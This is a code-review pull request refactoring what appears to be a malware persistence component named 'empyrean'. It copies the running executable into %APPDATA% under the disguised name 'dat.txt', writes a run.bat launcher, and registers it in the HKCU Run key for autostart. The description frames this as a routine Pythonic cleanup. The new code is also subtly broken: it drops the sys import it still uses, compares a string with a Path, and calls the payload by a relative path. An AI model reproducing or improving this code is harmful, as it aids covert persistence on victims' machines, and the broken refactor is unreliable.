### PR TITLE
Changes Made:

### DIFF
--- a/src/components/startup.py
+++ b/src/components/startup.py
@@ -1,39 +1,39 @@
-import subprocess
 import os
 import shutil
-import sys
+import subprocess
+from pathlib import Path
+
 
 class Startup:
-    def __init__(self) -> None:        
-        self.working_dir = os.getenv("APPDATA") + "\\empyrean"
-    
+    def __init__(self):
+        self.working_dir = Path(os.getenv("APPDATA")) / "empyrean"
+
         if self.check_self():
             return
 
         self.mkdir()
         self.write_stub()
         self.regedit()
-    
-    def check_self(self) -> bool:
-        if os.path.realpath(sys.executable) == self.working_dir + "\\dat.txt":
-            return True
 
-        return False
-    
-    def mkdir(self) -> str:
-        if not os.path.isdir(self.working_dir):
-            os.mkdir(self.working_dir)
-        
-        else:
+    def check_self(self):
+        return os.path.realpath(sys.executable) == self.working_dir / "dat.txt"
+
+    def mkdir(self):
+        if self.working_dir.exists():
             shutil.rmtree(self.working_dir)
-            os.mkdir(self.working_dir)
-    
-    def write_stub(self) -> None:
-        shutil.copy2(os.path.realpath(sys.executable), self.working_dir + "\\dat.txt")
-        
-        with open(file=f"{self.working_dir}\\run.bat", mode="w") as f:
-            f.write(f"@echo off\ncall {self.working_dir}\\dat.txt")
-    
-    def regedit(self) -> None:
-        subprocess.run(args=["reg", "delete", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/f"], shell=True)
-        subprocess.run(args=["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/t", "REG_SZ", "/d", f"{self.working_dir}\\run.bat", "/f"], shell=True)
+
+        self.working_dir.mkdir()
+
+    def write_stub(self):
+        shutil.copy2(os.path.realpath(sys.executable), self.working_dir / "dat.txt")
+
+        with (self.working_dir / "run.bat").open(mode="w") as f:
+            f.write("@echo off\ncall dat.txt")
+
+    def regedit(self):
+        try:
+            subprocess.run(["reg", "delete", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/f"], shell=True, check=True)
+        except subprocess.CalledProcessError as e:
+            pass
+
+        subprocess.run(["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/t", "REG_SZ", "/d", str(self.working_dir / "run.bat"), "/f"], shell=True, check=True)


### PR DESCRIPTION
Used pathlib.Path for path manipulation, which is more Pythonic and easier to use. Simplified the mkdir function by removing an unnecessary check and handling the case where the directory already exists with shutil.rmtree. Used subprocess.run with the check=True parameter to raise an exception if the command fails. Added a try-except block around the first reg delete command to ignore any errors that might occur.